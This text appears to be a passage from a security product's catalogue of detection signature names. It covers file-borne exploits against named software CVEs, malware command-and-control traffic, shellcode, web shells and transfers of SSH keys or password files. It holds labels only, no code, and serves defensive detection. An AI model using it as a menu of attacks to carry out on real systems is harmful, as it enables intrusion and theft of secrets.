File-Text_PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS
File-Text_PHP-Exception-Tostring-Denial-Of-Service
File-Text_PHP-Filter-In-Link-Or-Src-Attribute
File-Text_Php-PECL-Zip-URL-Wrapper-Buffer-Overflow
File-Text_Php-Phar_Parse_pharfile-Function-Filename_Len-Property-Integer-Overflow
File-Text_PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow
File-Text_Php-Probe-Script
File-Text_Php-Script-External-Command-Execution-Download
File-Text_Php-Script-External-Command-Execution-Download-2
File-Text_Php-Scripting-In-Server-Reply
File-Text_PHP-Test-Page-Transfer
File-Text_Php-Zend_Hash_destroy-Uninitialized-Pointer-Code-Execution
File-Text_Phpmyadmin-Searchcontroller-SQL-Injection
File-Text_PluginDetect-Script
File-Text_Possible-Cross-Site-Scripting-In-Img-Tag-Src-Attribute
File-Text_Possible-Metasploit-Generated-Malicious-File-Detected
File-Text_Possibly-Malicious-Certificate-File
File-Text_Possibly-Malicious-PowerShell-Commands-In-HTTP-Response
File-Text_Potential-Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-Text_Potential-SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
File-Text_Potentially-Malicious-SYLK-File
File-Text_PowerShell-In-Office-Document
File-Text_PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow
File-Text_Progress-WhatsUp-Gold-AppProfileImport-Unrestricted-File-Upload
File-Text_PTC-IsoView-ActiveX-Control-Multiple-Methods-Buffer-Overflow
File-Text_PTC-IsoView-ActiveX-Control-ViewPort-Heap-Buffer-Overflow
File-Text_Pulse-Secure-Cross_Site_Script_Inclusion
File-Text_PurpleFox-EK-Exploit-Redirect-Page
File-Text_PuTTY-User-Key-PPK-File-Transfer
File-Text_pwncat-Script
File-Text_Python-Rot13-File-Encoding
File-Text_Python-Script-With-Base64-Obfuscation-Pattern
File-Text_Quest-Intrust-Annotation-Objects-ActiveX-Control-Index-Out-Of-Bounds
File-Text_Quest-NetVault-Backup-Export-Arbitrary-File-Overwrite
File-Text_QZX-Obfuscated-JavaScript-Detected
File-Text_QZX-Obfuscated-Malicious-JavaScript-Detected
File-Text_QZX-Obfuscated-Malicious-JavaScript-Detected-2
File-Text_RDP-ActiveX-Control-Remote-Code-Execution-Vulnerability
File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-2
File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-3
File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-4
File-Text_RDStealer-Malware-C2-Traffic
File-Text_RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution
File-Text_RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow
File-Text_RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution
File-Text_RealNetworks-RealPlayer-Playlist-Handling-Exploit
File-Text_RealNetworks-RealPlayer-RecordClip-Parameter-Injection
File-Text_RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption
File-Text_RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow
File-Text_RealPlayer-RAM-File-Processing-Buffer-Overflow
File-Text_RealPlayer-Realpix-And-Realtext-Format-String-Compromise
File-Text_RealPlayer-Url-Parsing-Buffer-Overflow
File-Text_RealPlayer-Vulnerable-Embedded-ActiveX-Control
File-Text_Red-Lion-Crimson-CD3-Itemindexlist-Type-Confusion
File-Text_Red-Lion-Crimson-CD3-Port-List-Type-Confusion
File-Text_Reference-To-Local-Path
File-Text_Remote-VBScript-Loaded
File-Text_Reverse-Obfuscated-Script
File-Text_RIG-EK-Lander-Script
File-Text_Rising-Online-Virus-Scanner-ActiveX-Control-Denial-Of-Service
File-Text_RKD-Software-BarCodeAx.dll-Buffer-Overflow
File-Text_Roundcube-Webmail-Cascading-Style-Sheets-Filtering-Information-Disclosure
File-Text_Roundcube-Webmail-Cross-Site-Scripting-CVE-2020-35730
File-Text_Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting
File-Text_Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008
File-Text_Roundcube-Webmail-Linkref-Cross-Site-Scripting-CVE-2023-43770
File-Text_Roundcube-Webmail-XML-Attachment-Cross-Site-Scripting-CVE-2020-13965
File-Text_Roxio-CinePlayer-Buffer-Overflow
File-Text_Rst-Malware
File-Text_Ruby-On-Rails-JSON-Parse-Heap-Based-Buffer-Overflow
File-Text_Ruckus-Iot-Controller-Web-UI-Createuser-Remote-Command-Injection
File-Text_Safari-In-Operator-Side-Effect-Exploit
File-Text_Safari-Webkit-Jit-Exploit-For-iOS
File-Text_Safenet-HASP-SL-ActiveX-Control-ChooseFilePath-Buffer-Overflow
File-Text_Saint-Bot-Infection-Traffic
File-Text_SaltStack-Salt-API-SSH-Client-Command-Injection
File-Text_Same-Origin-Policy-Bypass
File-Text_Samsung-Ipolis-Device-Manager-Findconfigchildekeylist-Buffer-Overflow
File-Text_Samsung-Ipolis-Device-Manager-Writeconfigvalue-Stack-Buffer-Overflow
File-Text_Samsung-Kies-Arbitrary-Command-Execution
File-Text_Samsung-Net-I-Viewer-Buffer-Overflow
File-Text_Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Vulnerabilities
File-Text_Samsung-Smartviewer-Stwaxconfig-Memory-Corruption
File-Text_Samsung-Smartviewer-Stwaxconfignvr-Memory-Corruption
File-Text_SAP-Crystal-Reports-Printcontrol.dll-ActiveX-Control-Buffer-Overflow
File-Text_SAP-GUI-ActiveX-Control-Buffer-Overflow
File-Text_SAP-GUI-Arbitrary-File-Download
File-Text_SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow
File-Text_SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution
File-Text_SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
File-Text_SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite-Exploit
File-Text_SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324
File-Text_Sasfis-Bot-Traffic
File-Text_Schneider-Electric-C-Bus-Toolkit-Authentication-Bypass-Vulnerability
File-Text_Schneider-Electric-IGSS-Getrmsreportfile-Directory-Traversal
File-Text_Schneider-Electric-Isobjectmodel-Removeparameter-Stack-Buffer-Overflow
File-Text_Schneider-Electric-Pelco-DS-nvs-Rvctl.rvcontrol.1-Buffer-Overflow
File-Text_Schneider-Electric-Proclima-Atx45-Sethtmlfilename-Heap-Buffer-Overflow
File-Text_Schneider-Electric-Proclima-Metadraw-Several-Vulnerabilities
File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption
File-Text_Schneider-Electric-Somachine-Hvac-Axeditgrid-ActiveX-Untrusted-Pointer-Dereference
File-Text_Script-Encoder-Obfuscated-Script-Detected
File-Text_Script-File-With-Suspicious-References
File-Text_Script-From-A-Suspicious-Site
File-Text_Script-In-HTML-Head
File-Text_Scripting.FileSystemObject-ActiveX-Object-Local-File-Write
File-Text_Sednit-Exploit-Kit-Landing-Page
File-Text_Server-Side-Includes-In-Server-Reply
File-Text_Shared-Variables
File-Text_Shell.Application-ActiveX-Object-Local-File-Execute
File-Text_ShellExecute-ActiveX-Object-Batch-Script-Local-Execute
File-Text_Shiotop-Botnet-Traffic
File-Text_Siemens-Automation-License-Manager-ActiveX-Control-Vulnerability
File-Text_Siemens-Gigaset-se551-Information-Disclosure
File-Text_Siemens-SIMATIC-WinCC-RegReader-ActiveX-Control-Buffer-Overflow
File-Text_Siemens-Sinec-NMS-CVE-2021-33730-SQL-Injection
File-Text_Siemens-Sinec-NMS-CVE-2021-33731-SQL-Injection
File-Text_Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal
File-Text_Siemens-Solid-Edge-ST4/ST5-WebPartHelper-ActiveX-Control-Vulnerability
File-Text_SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption
File-Text_Smartertools-Smartermail-Message-Onerror-Stored-Cross-Site-Scripting
File-Text_SmartScreen-Security-warning-Bypass-For-Script-Files-CVE-2023-24880
File-Text_SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
File-Text_SocGholish-Framework-Injected-Script
File-Text_SocGholish-Zip-File
File-Text_Soft-Hyphen-Obfuscation
File-Text_Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-23478
File-Text_Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-28075
File-Text_Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write
File-Text_Solarwinds-Orion-Pepco32c-ActiveX-Control-Buffer-Overflow
File-Text_Solarwinds-Orion-Platform-Rendercontrol-Insecure-Deserialization
File-Text_Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Multiple-Vulnerabilities
File-Text_Solarwinds-SunBurst-Beacon
File-Text_Solarwinds-SunBurst-COSMICGALE
File-Text_Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204
File-Text_SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control
File-Text_SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-BOF
File-Text_Sophos-Firewall-User-Portal-And-WebAdmin-Code-Injection
File-Text_Sophos-UTM-WebAdmin-Sid-Command-Injection
File-Text_Sourcegraph-gitserver-sshCommand-RCE
File-Text_SpamAssassin-Malformed-Message-DoS
File-Text_Spectre-Side-Channel-Attack-JavaScript
File-Text_SPIP-Porte-Plume-Plugin-RCE
File-Text_Sprinter-Tidestone-Formula-One-Defaultfontname-Buffer-Overflow
File-Text_Squid-Proxy-Esi-Component-Stack-Buffer-Overflow
File-Text_Squid-Proxy-Esi-Response-Processing-Denial-Of-Service
File-Text_Squid-Proxy-Esi-Response-Processing-Denial-Of-Service-2
File-Text_Squid-Proxy-Esi-Response-Processing-Esi_Assign-Denial-Of-Service
File-Text_Squid-Proxy-Esi-Response-Processing-Esi_Assign-Underflow-Denial-Of-Service
File-Text_Squid-Proxy-Esi-Response-Processing-Nullpointer-Denial-Of-Service-CVE-2024-45802
File-Text_Squid-Proxy-Urn-Response-Processing-Heap-Buffer-Overflow
File-Text_SSH-Private-Key-File-Transfer
File-Text_SSReader-ActiveX-Control-Buffer-Overflow
File-Text_Star-Blizzard-Collect-and-Send-User-Data-POST-Request
File-Text_STARWHALE-Malware-C2-Traffic
File-Text_Sun-Java-Calendar-Deserialization-Privilege-Escalation
File-Text_Sun-Java-JRE-getSoundbank-Buffer-Overflow
File-Text_Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass
File-Text_Sun-Java-Web-Start-Launch-Command-Line-Injection
File-Text_Sun-Java-Web-Start-Plugin-Argument-Injection
File-Text_Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception
File-Text_Sunway-ForceControl-SCADA-Login-Method-ActiveX-Buffer-Overflow-Vulnerability
File-Text_SupportSoft-Products-ActiveX-Control-Buffer-Overflow
File-Text_Suspected_Website_Defacement
File-Text_Suspicious-ASPX-File-Content-Upload
File-Text_Suspicious-AutoDetect-Command
File-Text_Suspicious-Command-Inside-Zip-File
File-Text_Suspicious-Decimal-Content
File-Text_Suspicious-Flash-Detector-Script
File-Text_Suspicious-Flash-File-Source
File-Text_Suspicious-HTML-File
File-Text_Suspicious-HTTP-Equiv-Parameter
File-Text_Suspicious-Internet-Shortcut-File
File-Text_Suspicious-Interpreted-Script
File-Text_Suspicious-Java-Serialized-Object
File-Text_Suspicious-JScript-In-XML
File-Text_Suspicious-Jsp-File-Content-Upload
File-Text_Suspicious-Jsp-File-Upload
File-Text_Suspicious-MS-Search-URI-Scheme-Link-In-HTML
File-Text_Suspicious-MSDT-URI-Scheme-In-HTML
File-Text_Suspicious-Rfc822-Response-From-Server
File-Text_Suspicious-Text-File
File-Text_Suspicious-Text-File-2
File-Text_Suspiciously-Large-Windows-Script-File
File-Text_Suspicious_Inline_Iframe_Element-1
File-Text_Suspicious_Inline_Iframe_Element-2
File-Text_Suspicious_Script_Encoding
File-Text_Symantec-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow
File-Text_Symantec-Altiris-Deployment-Solution-ActiveX-File-Download
File-Text_Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow
File-Text_Symantec-AppStream-Client-ActiveX-Control-Vulnerable-Method-Call
File-Text_Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF
File-Text_Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow
File-Text_Symantec-Norton-AntiVirus-Stack-Exhaustion
File-Text_Symantec-Norton-Internet-Security-2006-COM-Object-Security-Bypass-Vulnerability
File-Text_Symantec-Norton-Personal-Firewall-2004-ActiveX-Control-Buffer-Overflow
File-Text_Symantec-Products-ActiveX-Control-NavComUI.dll-Possible-Code-Execution
File-Text_TeamViewer-Unquoted-URI-Handler-SMB-Redirect
File-Text_Telerik-UI-Insecure-Deserialization-CVE-2019-18935
File-Text_TerraMaster-TOS-Remote-Command-Execution-Vulnerability-CVE-2022-24990
File-Text_Teslacrypt-Botnet-Traffic
File-Text_Titan-MFT-Admin-Interface-Path-Traversal-CVE-2023-45689
File-Text_Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt
File-Text_Totolink-setupgradefw-Command-Injection-CVE-2022-26210
File-Text_TP-Link-TL-WR1043N-Cross-Site-Request-Forgery
File-Text_Trend-Micro-AntiVirus-Password-Manager-Command-Execution
File-Text_Trend-Micro-Control-Manager-Cross-Site-Request-Forgery
File-Text_Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner
File-Text_Trend-Micro-Iwsva-Logsettinghandler-Dopostmountdevice-Command-Injection
File-Text_Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection
File-Text_Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection
File-Text_Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String
File-Text_Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow
File-Text_Trend-Micro-OfficeScan-Corporate-Edition-Buffer-Overflow
File-Text_Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow
File-Text_Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution
File-Text_Trend-Micro-Safesync-For-Enterprise-Check_NFS_Server_Status-Command-Injection
File-Text_Trend-Micro-Safesync-For-Enterprise-License-Command-Injection
File-Text_Trend-Micro-Safesync-For-Enterprise-Replace_Local_Disk-Command-Injection
File-Text_TRENDnet-SecurView-Buffer-Overflow
File-Text_Trillian-Aim:-URI-Handler-Buffer-Overflow
File-Text_Trillian-Aim:-URI-Handler-Code-Injection
File-Text_Trustwave-Holdings-Modsecurity-Chunked-Transfer-Encoding-Policy-Bypass
File-Text_Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-BOF
File-Text_Ubisoft-Uplay-Arbitrary-Code-Execution
File-Text_Ultra-Office-Control-ActiveX-Control-Stack-Based-Buffer-Overflow
File-Text_Unicode-Encoded-Obfuscated-Script-File
File-Text_Unitronics-Unidownloader-And-VisiLogic-OPCL-Ipworksssl-Memory-Corruption
File-Text_Unitronics-VisiLogic-ActiveX-Out-Of-Bounds-Array-Indexing
File-Text_Unitronics-VisiLogic-OPLC-IDE-Teepreviewer-ChartLink-Memory-Corruption
File-Text_Unitronics-VisiLogic-OPLC-TeeCommander-ChartLink-ActiveX-Control-Memory-Corruption
File-Text_UTF-7-Encoded-HTML
File-Text_UTF-8-Title-In-HTML
File-Text_Vandyke-Securecrt-Configuration-Folder-Vulnerability
File-Text_Vawtrak-Botnet-Traffic
File-Text_VBScript-Array-Chr-Obfuscation
File-Text_VBScript-Directory-Traversal
File-Text_VBScript-Execute-Chr-Obfuscation
File-Text_VBScript-In-Bo-Bbs
File-Text_VBScript-In-Wordpress
File-Text_VBScript-Scripting-Detected
File-Text_VBScript_Engine_Use_After_Free_Vulnerability_CVE-2019-1485
File-Text_vBSEO-Remote-PHP-Code-Injection
File-Text_Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow
File-Text_VeryPDF-PDFView-Heap-Overflow
File-Text_Viber-URI-Handler-Remote-Code-Execution
File-Text_VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption
File-Text_VideoLAN-VLC-AMV-Code-Execution
File-Text_Vim-Modelines-Remote-Command-Execution
File-Text_Vim-Retab-Integer-Overflow
File-Text_ViperSoftX-Script-Content
File-Text_Virut-Malware-C2-Traffic
File-Text_Viscom-Image-Viewer-ActiveX-Tifmergemultifiles-Buffer-Overflow
File-Text_Visual-Basic-Script-ShellCode-Generation
File-Text_VLC-Media-Player-ABC-File-Instruction-Field-Parsing-Heap-Overflow
File-Text_VLC-Media-Player-ABC-File-Parts-Field-Parsing-Heap-Integer-Overflow
File-Text_VLC-Media-Player-ParseJSS-Heap-Buffer-Overflow
File-Text_VM2-Sandbox-Protection-Bypass-CVE-2022-36067
File-Text_VM2-Sandbox-Protection-Bypass-CVE-2023-29017
File-Text_VM2-Sandbox-Protection-Bypass-CVE-2023-30547
File-Text_VM2-Sandbox-Protection-Bypass-With-Code-Transformer-CVE-2023-29199
File-Text_VMware-Com-API-ActiveX-Control-Buffer-Overflow
File-Text_VMware-Fusion-Guest-VM-Remote-Code-Execution
File-Text_VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite
File-Text_VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution
File-Text_VMware-Spring-Cloud-Data-Flow-Skipper-Server-YAML-Insecure-Deserialization
File-Text_VMware-Vielib-ActiveX-CreateProcess-Command-Execution
File-Text_VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution
File-Text_VMware-Workstation-ActiveX-Partition-Table-Delete-Exploit
File-Text_Vulnerable-Microsoft-Internet-Explorer-Function-Called
File-Text_W3C-Amaya-Web-Browser-Stack-Based-Buffer-Overflow
File-Text_WANRemote-Backdoor-Response
File-Text_Webgate-eDVR-Manager-WESPMonitor-LoadImage-Buffer-Overflow
File-Text_Webgate-Multiple-Products-Wespplaybackctrl-Two-Stack-Buffer-Overflow
File-Text_Webgate-Multiple-Products-WESPSerialPortCtrl-Stack-Buffer-Overflow
File-Text_Webgate-Wespsdk-Wespdiscovery-Stack-Buffer-Overflow
File-Text_WebGrabber-ActiveX-Control-Buffer-Overflow
File-Text_Webkit-getImageData-Buffer-Overflow-CVE-2018-12293
File-Text_Webkit-Object-Outline-Memory-Corruption
File-Text_Webkit-Use-After-Free-CVE-2017-7042
File-Text_WebRTC-Heap-Buffer-Overflow-CVE-2022-2294
File-Text_Wecon-Levistudio-Datalogtool-Ini-Parser-Stack-Based-Buffer-Overflow
File-Text_Wecon-Levistudio-Datalogtool-Stack-Based-Buffer-Overflow
File-Text_WellinTech-KingView-SCADA-KVWebSvr.dll-ActiveX-Contorl-Heap-Buffer-Overflow
File-Text_WellinTech-Multiple-Products-Kxclientdownload-ActiveX-Remote-Code-Execution
File-Text_Wibukey-Runtime-For-Windows-ActiveX-Control-Buffer-Overflow
File-Text_Windows-Command-Shell-Exec-In-Script
File-Text_Windows-Elevation-of-Privilege-Vulnerability-CVE-2016-0040
File-Text_Windows-Environment-Variables-In-Script
File-Text_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise
File-Text_Windows-Help-And-Support-Center-Hcp-Url-System-Compromise-MS04-011
File-Text_Windows-HTML-Platforms-Security-Feature-Bypass
File-Text_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2022-24502
File-Text_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269
File-Text_Windows-Kernel-cng.sys-Buffer-Overflow-CVE-2020-17087
File-Text_Windows-Media-Center-RCE-CVE-2015-6127
File-Text_Windows-Media-Center-RCE-CVE-2015-6131
File-Text_Windows-Media-Player-CVE-2017-0042
File-Text_Windows-Media-Player-Plugin-Embed-Src-Buffer-Overflow
File-Text_Windows-MFT-File-Name-Crash
File-Text_Windows-Mixed-Reality-Developer-Tools-Information-Disclosure
File-Text_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
File-Text_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573
File-Text_Windows-OLE-Automation-For-VBScript-Scripting-Engine-CVE-2016-3375
File-Text_Windows-Out-Of-Bounds-Vulnerability-Poc
File-Text_Windows-Scripting-Engine-Memory-Corruption
File-Text_Windows-Scripting-Engine-Memory-Corruption-CVE-2018-8552
File-Text_Windows-Scripting-Languages-Remote-Code-Execution-CVE-2022-41118
File-Text_Windows-Shell-Command-Run-By-Script
File-Text_Windows-Shell-Commands-In-Uploaded-File
File-Text_Windows-Shell-Remote-Code-Execution-Vulnerability-CVE-2018-8495
File-Text_Windows-Theme-File-Remote-Code-Execution-Vulnerability
File-Text_Windows-Theme-File-VisualStyles-SMB-Path
File-Text_Windows-VBScript-Engine-Remote-Code-Execution-CVE-2018-8544
File-Text_Windows-VBScript-Engine-Remote-Code-Execution-Vulnerability-CVE-2018-8625
File-Text_Windows-Visual-Studio-Code-Git-Extension-Argument-Injection
File-Text_Windows-Visual-Studio-Code-Jupyter-Notebook-Remote-Code-Execution
File-Text_WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow
File-Text_WinZip-FileView-ActiveX-Control-Buffer-Overflow
File-Text_WinZip-UUDeview-Mime-Archive-Buffer-Overrun
File-Text_Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow
File-Text_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities
File-Text_Wordpress-Comment-Content-Filter-Remote-Code-Execution
File-Text_Wordpress-Download-Manager-Plugin-Package-Settings-Stored-XSS
File-Text_Wordpress-Forminator-Plugin-Reflected-Cross-Site-Scripting
File-Text_Wordpress-Suspicious-JavaScript-Iframe-Injection
File-Text_Worldweaver-DX-Studio-Player-Command-Execution
File-Text_WScript.Shell-ActiveX-Object-Local-File-Execute
File-Text_WScript.Shell-ActiveX-Object-Local-Registry-Access
File-Text_x86-Unescape-X90nop-Shellcode
File-Text_x86-X41nop-Shellcode
File-Text_x86-X41nop-Shellcode-2
File-Text_x86-X41nop-Shellcode-With-Host-As-IP
File-Text_x86-X90nop-Shellcode
File-Text_Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities
File-Text_Xstream-Library-CVE-2020-26217-Insecure-Deserialization
File-Text_Xstream-Library-CVE-2020-26258-Insecure-Deserialization
File-Text_Xstream-Library-Reflectionconverter-Insecure-Deserialization
File-Text_Xstream-Unsafe-Deserialization
File-Text_Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow
File-Text_Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute
File-Text_Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow
File-Text_Xunlei-Thunderbolt-ActiveX-Object-Local-Zone-Code-Execution
File-Text_Yahoo!-Messenger-YVerInf-ActiveX-Control-Buffer-Overflows
File-Text_Yahoo!-Messenger-YWcUpl.WcUpload-ActiveX-Control-Exploit
File-Text_Yahoo!-Messenger-YWcVwr.WcViewer-ActiveX-Control-Exploit
File-Text_Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow
File-Text_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow
File-Text_Yahoo-Toolbar-ActiveX-Control-Denial-Of-Service-CVE-2007-6228
File-Text_Your-Freedom-Cgi-Response
File-Text_Your-Freedom-HTTP-Response
File-Text_Ysoserial-Generated-DotNet-Serialized-Object
File-Text_Zabbix-Addrelatedobjects-SQL-Injection-CVE-2024-42327
File-Text_Zabbix-Server-PDF_Report_creator.go-Arbitrary-File-Read
File-Text_Zelune-Access
File-Text_Zenoss-Core-Version-Check-Remote-Code-Execution
File-Text_Zenturi-ProgramChecker-sasatl-ActiveX-Control-Fill-Method
File-Text_Zenturi-ProgramChecker-sasatl-ActiveX-Control-Scan-Method-BOF
File-Text_Zimbra-Collaboration-Autodiscover-Servlet-Xxe
File-Text_Zimbra-Collaboration-Classic-Web-Client-Cross-Site-Scripting-CVE-2023-37580
File-Text_Zoho-Manageengine-ADaudit-Plus-Arbitrary-File-Write-CVE-2021-42847
File-Text_Zoho-Manageengine-Applications-Manager-Userconfigurationaction-Cross-Site-Scripting
File-Text_Zoho-Manageengine-Servicedesk-Plus-Custom-Schedules-Arbitrary-Command-Execution
File-Text_ZooKeeper-Exhibitor-UI-Command-Injection
File-Text_Zoom-Linux-Client-Command-Injection-CVE-2017-15049
File-Text_ZTE-WebShell-Cmd-Backdoor-CVE-2014-2321
File-Text_ZyXEL-Undocumented-User-Credentials-CVE-2020-29583
File-Zip_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Zip_Apache-Jetspeed-Portal-Site-Manager-Zip-File-Upload-Directory-Traversal
File-Zip_Apache-OpenMeetings-Zip-File-Path-Traversal
File-Zip_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
File-Zip_Archive-Detected
File-Zip_Conflicting-Content-Type-AVI
File-Zip_Conflicting-Content-Type-Text
File-Zip_Conflicting-Content-Type-Text-HTML
File-Zip_Conflicting-Content-Type-Text-Plain
File-Zip_Cyberpower-Powerpanel-Business-Import-Profile-Directory-Traversal
File-Zip_Directory-Traversal-In-Archive-Filename
File-Zip_EICAR-AntiVirus-Test
File-Zip_Executable-In-Archive
File-Zip_Executable-In-JAR
File-Zip_Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read
File-Zip_Ivanti-Avalanche-Extractzipentry-Directory-Traversal
File-Zip_JAR-File-Detected
File-Zip_Lexmark-Markvision-Enterprise-Libraryfileuploadservlet-Directory-Traversal
File-Zip_Long-Filename
File-Zip_Manageengine-Servicedesk-File-Upload-Directory-Traversal
File-Zip_Metasploit-Shellcode-JAR
File-Zip_Microsoft-Java-VM-Bytecode-Verifier-Bypass-JAR
File-Zip_Microsoft-Office-Excel-Xlsx-File-Parsing-Code-Execution
File-Zip_Microsoft-Office-Open-XML-TIFF-Filename-Detected
File-Zip_Microsoft-Office-Remote-Code-Execution-CVE-2025-21365
File-Zip_Microsoft-Visual-Studio-Python-Interpreter-RCE
File-Zip_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-1
File-Zip_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-3
File-Zip_Microsoft-Windows-Media-Player-Skin-Parsing-Code-Execution
File-Zip_Microsoft-Windows-MFC-Document-Title-Updating-Buffer-Overflow
File-Zip_Microsoft-Windows-Shell-Zip-File-Remote-Code-Execution
File-Zip_MS-Compressed-Folders-DUNZIP32-DLL-Buffer-Overflow-MS04-034
File-Zip_Norton-AntiVirus-Decompression-Bomb-Denial-Of-Service
File-Zip_Opencart-Archive-Extraction-Directory-Traversal
File-Zip_Oracle-Java-7-Applet-Remote-Code-Execution
File-Zip_Oracle-Java-Atomicreferencearray-Sandbox-Breach
File-Zip_Oracle-Java-Final-Field-Overwrite
File-Zip_Oracle-Java-Font-Processing-Memory-Corruption
File-Zip_Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption
File-Zip_Oracle-Java-Java.sql.drivermanager-Sandbox-Bypass
File-Zip_Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach
File-Zip_Oracle-Java-Rmi-Services-Default-Configuration-Remote-Code-Execution
File-Zip_Oracle-Java-Runtime-Bytecode-Verifier-Cache-Code-Execution
File-Zip_Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow
File-Zip_Oracle-Java-Sun.awt.image.imagerepresentation.setpixels-Integer-Overflow
File-Zip_Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass
File-Zip_Oracle-Java-Zip_Util-Readcen-Stack-Overflow
File-Zip_Oracle-JRE-Shortcomponentraster.verify-Memory-Corruption
File-Zip_Perl-Archive-Zip-Arbitrary-File-Overwrite
File-Zip_Php-Group-Php-Zip-Integer-Overflow
File-Zip_PPH-Ziparchive-Getfromindex-And-Getfromname-Integer-Overflow
File-Zip_RARLAB-WinRAR-Zip-File-Out-of-Bounds-Read
File-Zip_Shared-Variables
File-Zip_Softing-Secure-Integration-Server-v1.22-RCE
File-Zip_Suspicious-File-Detected
File-Zip_Suspicious-Filename-In-Archive
File-Zip_Suspicious-JAR-File-With-Image-Extension
File-Zip_Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service
File-Zip_Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187
File-Zip_Unitronics-VisiLogic-OPLC-IDE-Vlp-File-Parsing-Heap-Buffer-Overflow
File-Zip_Unzip-Extra-Field-Uncompressed-Size-Buffer-Overflow
File-Zip_Wordpress-Plugin-Elementor-Authenticated-Upload-Remote-Code-Execution
File-Zip_Writeablebitmap-Setsource-Information-Disclosure
File-Zip_Zoho-Manageengine-Desktop-Central-Appdependency-Arbitrary-File-Write
FileBound
FileCatalyst
filecloud.io
Fileden
Filefactory
Fileguri
Filehippo
FileHold
Filehost.co.za
Filehost.ro
Filekicker
Filemail.com
Filenara
Fileplanet
Filer.cx
Files Containing Passwords
files.to
Filesanywhere
Filesdirect
Fileserve-Upload
FileSociety
FileSonic
FilesTube
File_7z-Archive
File_ACE-Archive
File_Adobe-Audition
File_Adobe-Cross-Domain-Policy
File_Adobe-Flash
File_Adobe-Flash-Video
File_Adobe-Photoshop-Document
File_Adobe-PostScript
File_Allowed
File_Android-Application-Package
File_Android-Compressed-Resources
File_Android-Compressed-XML
File_Android-Dalvik-Executable
